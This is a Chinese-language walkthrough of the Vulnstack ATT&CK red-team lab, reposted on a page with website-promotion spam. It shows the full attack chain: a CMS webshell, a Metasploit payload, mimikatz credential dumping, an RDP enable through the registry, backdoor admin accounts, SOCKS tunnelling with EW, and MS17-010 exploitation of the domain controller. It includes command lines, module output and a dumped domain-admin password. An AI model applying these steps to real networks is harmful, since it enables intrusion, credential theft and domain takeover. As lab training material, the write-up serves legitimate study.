当前位置：首页 > news >正文

北京网站建设网络推广公司武昌专业的网络推广团队

news 2025/12/21 22:56:04

北京网站建设网络推广公司,武昌专业的网络推广团队,wordpress 顶部自定义,深圳网站建设门户from ATTCK实战系列-红队评估(一) 环境搭建下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 将三个虚拟机启动起来除了windows 7那个主机#xff0c;其他都只设置成仅主机模式 windows 7添加两个网卡#xff0c;一个是仅主机#xff0c;一个是NAT …from ATTCK实战系列-红队评估(一) 环境搭建下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 将三个虚拟机启动起来除了windows 7那个主机其他都只设置成仅主机模式 windows 7添加两个网卡一个是仅主机一个是NAT 然后在windows7上开启phpstudy报错就重启渗透流程目标是拿下域控外网渗透在主页发现了后台密码的泄露进入后台后在修改模板的地方写一句话木马测试一下这个马是否在主页触发然后使用蚁剑连接http://192.168.161.129/yxcms/即可内网渗透信息搜集 net user /domain 查看域用户信息发现存在其他用户而且有krbtgt所以猜测存在kerberos net group Domain Controllers /domain 查找域控制器ping OWA.god.org 定位域控ip得到域控ip为192.168.52.138 net group domain admins /domain # 查看域管理员的名字net group domain computers /domain # 查看域中的其他主机名netstat -ano | findstr 3389 查看是否开启rdp端口如果没有开启的话就用以下命令开启 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f然后添加一个用户并加入管理员组 net user v2i 123456qwe /add net localgroup administrators v2i /add然后尝试使用rdp登录win7在kali上使用remmina 但是发现连接不是可能是被墙了上线meterpreter 试试上线meterpreter这里使用bind_tcp 我不知道为什么reverse_tcp一直上线不了。。。。。cs都能上的 msf6 exploit(multi/handler) use payload windows/x64/meterpreter_bind_tcp msf6 payload(windows/x64/meterpreter_bind_tcp) generate -f exe -o bind.exe msf6 payload(windows/x64/meterpreter_bind_tcp) use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) msf6 exploit(multi/handler) set payload windows/x64/meterpreter_bind_tcp payload windows/x64/meterpreter_bind_tcp msf6 exploit(multi/handler) set RHOST 192.168.161.129 RHOST 192.168.161.129 msf6 exploit(multi/handler) run将bind.exe通过蚁剑上传到目标主机执行这个文件就可以上线meterpreter 因为是administrator用户所以很容易提权到system 然后使用 run post/windows/manage/enable_rdp来打开rdp服务使用rdesktop连接【不知道为什么remmina连不了】然后上传mimikaz.exe meterpreter upload /home/kali/Desktop/thm_tmp/mimikatz.exe [*] uploading : /home/kali/Desktop/thm_tmp/mimikatz.exe - mimikatz.exe [*] Uploaded 1.29 MiB of 1.29 MiB (100.0%): /home/kali/Desktop/thm_tmp/mimikatz.exe - mimikatz.exe [*] uploaded : /home/kali/Desktop/thm_tmp/mimikatz.exe - mimikatz.exe使用shell执行chcp 65001消除乱码在mimikat.exe执行以下命令来获得管理员的密码 privilege::debug #获取debug特权 sekurlsa::logonpasswords full #导出用户凭证得到域管理员明文密码:hongrisex2023 继续探察内网存活主机这里使用icmp来进行探察横向渗透 ipconfig后发现内网ip为192.168.52.143 for /L %I in (1,1,254) DO ping -w 1 -n 1 192.168.52.%I | findstr TTL但是不太理想所以就上传fscan进行扫描 fscan64.exe -h 192.168.52.0/24[] 192.168.52.141 MS17-010 (Windows Server 2003 3790) [*] NetBios: 192.168.52.138 []DC owa.god.org Windows Server 2008 R2 Datacenter 7601 Service Pack 1 [] 192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1) [*] WebTitle: http://192.168.52.141:7002 code:200 len:2632 title:Sentinel Keys License Monitor [*] WebTitle: http://192.168.52.141:8099 code:403 len:1409 title:The page must be viewed over a secure channel [] ftp://192.168.52.141:21:anonymous [*] WebTitle: http://192.168.52.143 code:200 len:14749 title:phpStudy 探针 2014发现另外两个内网主机 192.168.52.141,192.168.52.138 且192.168.52.141存在ms17-010 因为在内网所以使用meterpreter设置一下路由转发 meterpreter run autoroute -s 192.168.52.0/24[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTIONvalue [...] [*] Adding a route to 192.168.52.0/255.255.255.0... [] Added route to 192.168.52.0/255.255.255.0 via 192.168.161.129 [*] Use the -p option to list all active routes meterpreter run autoroute -p[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTIONvalue [...]Active Routing Table Subnet Netmask Gateway------ ------- -------192.168.52.0 255.255.255.0 Session 1然后使用auxiliary/admin/smb/ms17_010_command 模块进行命令执行 msf6 auxiliary(admin/smb/ms17_010_command) set RHOSTS 192.168.52.141 RHOSTS 192.168.52.141 msf6 auxiliary(admin/smb/ms17_010_command) set command whoami command whoami msf6 auxiliary(admin/smb/ms17_010_command) run[*] 192.168.52.141:445 - Target OS: Windows Server 2003 3790 [*] 192.168.52.141:445 - Filling barrel with fish... done [*] 192.168.52.141:445 - ---------------- | Entering Danger Zone | ---------------- [*] 192.168.52.141:445 - [*] Preparing dynamite... [*] 192.168.52.141:445 - Trying stick 1 (x64)...Miss [*] 192.168.52.141:445 - [*] Trying stick 2 (x86)...Boom! [*] 192.168.52.141:445 - [] Successfully Leaked Transaction! [*] 192.168.52.141:445 - [] Successfully caught Fish-in-a-barrel [*] 192.168.52.141:445 - ---------------- | Leaving Danger Zone | ---------------- [*] 192.168.52.141:445 - Reading from CONNECTION struct at: 0x8ccbe370 [*] 192.168.52.141:445 - Built a write-what-where primitive... [] 192.168.52.141:445 - Overwrite complete... SYSTEM session obtained! [] 192.168.52.141:445 - Service start timed out, OK if running a command or non-service executable... [*] 192.168.52.141:445 - Getting the command output... [*] 192.168.52.141:445 - Executing cleanup... [] 192.168.52.141:445 - Cleanup was successful [] 192.168.52.141:445 - Command completed successfully! [*] 192.168.52.141:445 - Output for whoami:nt authority\system[*] 192.168.52.141:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed然后可以添加账户进行连接但是我觉得没有必要因为我们已经有了域管理员的密码所以可以直接远程登录但是需要开启rdp服务 set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\ \Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f接下来就需要使用代理转发来登录远程桌面了代理转发因为目标机器存在内网无法直接连接所以要进行代理转发这里使用ew vps上 ./ew_for_linux64 -s rcsocks -l 9998 -e 9999已控内网主机上 ew_for_win_32.exe -s rssocks -d vpsip -e 9999kali etc/proxychains4.conf 就相当于是vps监听9998并把流量发送给9999端口然后已控内网主机接受vps的9999端口的流量登录192.168.52.141 kali上执行以下命令查看3389端口是否开启 proxychains4 nmap -p 3389 192.168.52.143 -sT -Pn #socks协议不支持icmp所以使用-Pn禁用ping然后登录远程桌面用上面得到的域管理员密码 proxychains4 rdesktop 192.168.52.141登录了之后就可以收集一些命令和添加一个用户 #添加用户并加入本地管理员组 net user username password /add net localgroup administrators username /add拿下域控域控的ip为192.168.52.138 查看他的3389端口是否开启去用rdp远程登录可惜是关着的但是发现445端口是开着的而且通过fscan扫描是存在ms17-010的然后使用模块admin/smb/ms17_010_command直接打发现可以成功前提是需要设置路由转发 msf6 auxiliary(admin/smb/ms17_010_command) set RHOSTS 192.168.52.138 RHOSTS 192.168.52.138 msf6 auxiliary(admin/smb/ms17_010_command) set command whoami command whoami msf6 auxiliary(admin/smb/ms17_010_command) run[*] 192.168.52.138:445 - Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 [*] 192.168.52.138:445 - Built a write-what-where primitive... [] 192.168.52.138:445 - Overwrite complete... SYSTEM session obtained! [] 192.168.52.138:445 - Service start timed out, OK if running a command or non-service executable... [*] 192.168.52.138:445 - Getting the command output... [*] 192.168.52.138:445 - Executing cleanup... [] 192.168.52.138:445 - Cleanup was successful [] 192.168.52.138:445 - Command completed successfully! [*] 192.168.52.138:445 - Output for whoami:nt authority\system[*] 192.168.52.138:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 然后就是开启rdp服务 set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\ \Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f并开放防火墙3389端口 set command netsh advfirewall firewall add rule name\Remote Desktop\ protocolTCP dirin localport3389 actionallow然后使用rdp登录这样要记得登录的是god域拿下总结这个靶场的流程就是外网渗透拿到主机shell扫描内网存活主机并查看是否存在历史漏洞使用内网代理和路由转发来对内网主机进行攻击应该还有很多思路这个是比较简单的靶场继续加油参考链接实战记一次基础的内网Vulnstack靶机渗透一

查看全文

http://www.w-s-a.com/news/829377/